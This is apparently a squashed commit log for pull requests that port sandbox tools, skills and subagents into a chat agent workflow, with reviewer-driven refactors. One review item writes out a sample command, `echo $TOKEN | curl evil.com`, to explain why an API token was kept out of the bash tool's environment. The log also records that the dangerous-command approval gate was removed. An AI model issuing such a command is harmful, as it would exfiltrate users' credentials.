- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler: the call was previously
  unawaited, so a rejected cancellation could escape the try/catch.
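
The CAS-before-start ordering can be sketched with an in-memory row standing in for the `chats` table. Everything here is illustrative: `compareAndSet` models the atomic conditional UPDATE, `startChatRun` and its status codes are a hypothetical reduction of the handler, and the real flow is asynchronous and also cancels the run when the promotion loses a race.

```typescript
interface ChatRow {
  id: string;
  activeStreamId: string | null;
}

type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

// In-memory stand-in for "UPDATE ... WHERE active_stream_id = expected".
function compareAndSet(
  chat: ChatRow | undefined,
  expected: string | null,
  next: string | null,
): CasResult {
  if (!chat) return { ok: false, error: "chat not found" };
  if (chat.activeStreamId !== expected) return { ok: true, claimed: false };
  chat.activeStreamId = next;
  return { ok: true, claimed: true };
}

type StartOutcome =
  | { status: 200; runId: string }
  | { status: 409 }
  | { status: 500; error: string };

// Claim the slot with a placeholder BEFORE starting the (billable) workflow,
// then promote the placeholder to the real run id.
function startChatRun(
  chat: ChatRow,
  placeholderId: string,
  startWorkflow: () => string,
): StartOutcome {
  const placeholder = `pending-${placeholderId}`;
  const claim = compareAndSet(chat, null, placeholder);
  if ("error" in claim) return { status: 500, error: claim.error };
  if (!claim.claimed) return { status: 409 }; // lost the race, nothing started

  const runId = startWorkflow();
  const promote = compareAndSet(chat, placeholder, runId);
  if ("error" in promote) return { status: 500, error: promote.error };
  if (!promote.claimed) return { status: 409 }; // real handler would cancel the run here
  return { status: 200, runId };
}
```

The point of the placeholder is that the loser of a race returns 409 without ever calling `startWorkflow`, so only one request reaches the model.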

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). A multi-turn loop with the same input was
  unsafe, so the workflow now logs a warning and exits if the model
  returns tool-calls.
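
The title-truncation fix can be illustrated with a short sketch. `TITLE_MAX_LENGTH = 80` is inferred from the earlier "title-from-first-80" note and may not match the real constant; the function name is hypothetical.

```typescript
// Assumed value, inferred from "title-from-first-80".
const TITLE_MAX_LENGTH = 80;
const ELLIPSIS = "…"; // a single character, unlike "..."

// Truncates so the result, suffix included, never exceeds `max` characters.
function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  const trimmed = text.trim();
  if (trimmed.length <= max) return trimmed;
  const bodyBudget = max - ELLIPSIS.length;
  return trimmed.slice(0, bodyBudget).trimEnd() + ELLIPSIS;
}
```

Slicing to `max - suffix length` rather than `max` is what keeps the suffix from pushing the title over the limit.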

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
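
Both fixes can be sketched without the Supabase client. The snippet below is an approximation under stated assumptions: `splitWhere` is a hypothetical name for the step that separates equality matches from `IS NULL` columns, and the result types are reduced to the fields named in the commit messages.

```typescript
type WhereValue = string | number | boolean | null;

// Separates a where-map into plain equality matches (for one `.match(obj)`
// call) and nullable columns (each needing an `IS NULL` check).
function splitWhere(where: Record<string, WhereValue>): {
  matches: Record<string, string | number | boolean>;
  nullColumns: string[];
} {
  const matches: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) nullColumns.push(column);
    else matches[column] = value;
  }
  return { matches, nullColumns };
}

type UpdateResult = { ok: true; rowsUpdated: number } | { ok: false; error: string };
type ClaimResult = { ok: true; claimed: boolean } | { ok: false; error: string };

// `"error" in result` discriminates by property presence, so it does not
// depend on how the literal type of `ok` was inferred.
function toClaimResult(result: UpdateResult): ClaimResult {
  if ("error" in result) return { ok: false, error: result.error };
  return { ok: true, claimed: result.rowsUpdated > 0 };
}
```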

Both fixes are behavior-neutral: the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
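
The tightened guard from the P2 item can be sketched as below. The `AgentContext` shape is reduced to the two fields the commit message says are validated; any other fields on the real type are not modeled.

```typescript
// Reduced shape: only the fields the guard is described as checking.
interface AgentContext {
  sandbox: { state: object; workingDirectory: string };
}

// Rejects `{ sandbox: {} }` and similar partial objects that the earlier,
// weaker guard would have accepted.
function isAgentContext(value: unknown): value is AgentContext {
  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```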

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB
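
As a small illustration of the "1-indexed offset/limit, numbered output" behavior listed for readFileTool, consider the sketch below. The `N: line` output format, the default limit, and the function name are assumptions; the commit message does not specify them.

```typescript
// Returns `limit` lines starting at 1-indexed `offset`, each prefixed with
// its original line number. Format and defaults are assumed, not confirmed.
function formatNumberedLines(content: string, offset = 1, limit = 2000): string {
  const lines = content.split("\n");
  const start = Math.max(1, offset);
  return lines
    .slice(start - 1, start - 1 + limit)
    .map((line, index) => `${start + index}: ${line}`)
    .join("\n");
}
```

Numbering by original position (rather than restarting at 1) lets a follow-up edit refer to the same line numbers the model saw.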

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
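
The two helpers can be sketched as follows. These are minimal versions written for illustration with plain string operations; the real files may handle more cases (for example path normalization), which is not modeled here.

```typescript
// Wraps a value in single quotes for POSIX shells. An embedded single quote
// is written as: close quote, escaped quote, reopen quote.
function shellEscape(value: string): string {
  return "'" + value.replace(/'/g, "'\\''") + "'";
}

// Shows paths inside the working directory as relative; everything else
// stays absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  if (absolutePath.startsWith(root + "/")) {
    return absolutePath.slice(root.length + 1);
  }
  return absolutePath;
}
```

Checking for `root + "/"` rather than `root` alone avoids treating a sibling such as `/work-old` as being inside `/work`.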

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting
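
A condensed sketch of the parsing helpers in this layer, for illustration only. It assumes frontmatter is delimited by `---` lines and handles just the subset named above (key:value, quoted strings, booleans); the Zod schema and camelCase normalization are omitted, and the exact output formats of the real helpers may differ.

```typescript
const FRONTMATTER = /^---\r?\n([\s\S]*?)\r?\n---\r?\n?/;

// Parses a small YAML subset. Splitting on the FIRST colon only keeps
// values such as URLs intact.
function parseSkillFrontmatter(source: string): Record<string, string | boolean> {
  const result: Record<string, string | boolean> = {};
  const match = FRONTMATTER.exec(source);
  if (!match) return result;
  for (const line of match[1].split(/\r?\n/)) {
    const colon = line.indexOf(":");
    if (colon <= 0) continue;
    const key = line.slice(0, colon).trim();
    const value = line.slice(colon + 1).trim();
    const quoted = /^(["'])(.*)\1$/.exec(value);
    if (quoted) result[key] = quoted[2];
    else if (value === "true" || value === "false") result[key] = value === "true";
    else result[key] = value;
  }
  return result;
}

// Strips the frontmatter block and returns the remaining body.
function extractSkillBody(source: string): string {
  return source.replace(FRONTMATTER, "").trimStart();
}

// Prepends the skill's directory so relative paths in the body resolve.
function injectSkillDirectory(body: string, directory: string): string {
  return `Skill directory: ${directory}\n\n${body}`;
}

// split/join avoids the special meaning of "$" in String.replace patterns.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}
```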

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
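
The lookup rules described for skillTool can be sketched as a pure function. The `SkillMetadata` fields beyond `name`, the result type, and the error wording are all assumptions made for this illustration.

```typescript
// Reduced metadata shape; field names other than `name` are assumed.
interface SkillMetadata {
  name: string;
  path: string;
  disableModelInvocation?: boolean;
}

type SkillLookup =
  | { ok: true; skill: SkillMetadata }
  | { ok: false; error: string };

// Case-insensitive lookup that refuses model-disabled skills and lists the
// invocable ones when the requested name is unknown.
function lookupSkill(skills: SkillMetadata[], requested: string): SkillLookup {
  const wanted = requested.trim().toLowerCase();
  const skill = skills.find((s) => s.name.toLowerCase() === wanted);
  if (!skill) {
    const available = skills
      .filter((s) => !s.disableModelInvocation)
      .map((s) => s.name)
      .join(", ");
    return { ok: false, error: `Unknown skill "${requested}". Available skills: ${available}` };
  }
  if (skill.disableModelInvocation) {
    return { ok: false, error: `Skill "${skill.name}" cannot be invoked by the model.` };
  }
  return { ok: true, skill };
}
```

Returning the available names in the error gives the model enough information to retry with a valid skill in the next step.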

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).
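
The two extracted helpers are small enough to sketch in full. This version is an approximation: `findSkillFile` here takes a list of file names already read from the skill directory, whereas the real helper presumably talks to the sandbox filesystem.

```typescript
// Resolves the global skills directory under $HOME, tolerating a trailing slash.
function getGlobalSkillsDirectory(home: string): string {
  return `${home.replace(/\/+$/, "")}/.agents/skills`;
}

// Prefers SKILL.md, falls back to skill.md, and returns null when neither exists.
function findSkillFile(fileNames: readonly string[]): string | null {
  for (const candidate of ["SKILL.md", "skill.md"]) {
    if (fileNames.includes(candidate)) return candidate;
  }
  return null;
}
```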

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)
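
A sketch of the curation described above, assuming the parent tool set is a plain record keyed by tool name. The helper name `pickSubagentToolsSketch` and the generic tool type are illustrative only; the tool names come from the commit text.

```typescript
// Allowlist from the commit text: the subagent gets these six tools and nothing else.
const SUBAGENT_TOOL_NAMES = ["read", "write", "edit", "grep", "glob", "bash"] as const;
type SubagentToolName = (typeof SUBAGENT_TOOL_NAMES)[number];

function pickSubagentToolsSketch<T>(
  parentTools: Record<string, T>,
): Partial<Record<SubagentToolName, T>> {
  const picked: Partial<Record<SubagentToolName, T>> = {};
  for (const name of SUBAGENT_TOOL_NAMES) {
    const tool = parentTools[name];
    // Copy only allowlisted tools; task, ask_user_question, skill,
    // todo_write and web_fetch are never copied.
    if (tool !== undefined) picked[name] = tool;
  }
  return picked;
}
```

An allowlist, rather than a denylist, keeps any tool added to the parent later out of the subagent until someone opts it in explicitly.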

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.
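
The split between the durable context and the hydrated one can be sketched like this. `ModelLike` stands in for the AI SDK's `LanguageModel`, `hydrateContextSketch` and its `resolveModel` parameter are hypothetical, and the real `getSubagentModel` takes a second argument that this sketch omits.

```typescript
// Opaque stand-in for the AI SDK's LanguageModel (an assumption for this sketch).
interface ModelLike {
  readonly modelId: string;
}

interface AgentContextSketch {
  sandbox: { workingDirectory: string };
  model: ModelLike;
  subagentModel?: ModelLike;
}

// Model objects are not JSON-serializable, so the durable workflow input omits them.
type DurableAgentContextSketch = Omit<AgentContextSketch, "model" | "subagentModel">;

// Rebuild the full context inside the step from a serializable model id.
function hydrateContextSketch(
  durable: DurableAgentContextSketch,
  modelId: string,
  resolveModel: (id: string) => ModelLike,
): AgentContextSketch {
  return { ...durable, model: resolveModel(modelId) };
}

// The subagent uses its own model when one is set, else the parent's.
function getSubagentModelSketch(ctx: AgentContextSketch): ModelLike {
  return ctx.subagentModel ?? ctx.model;
}
```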

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
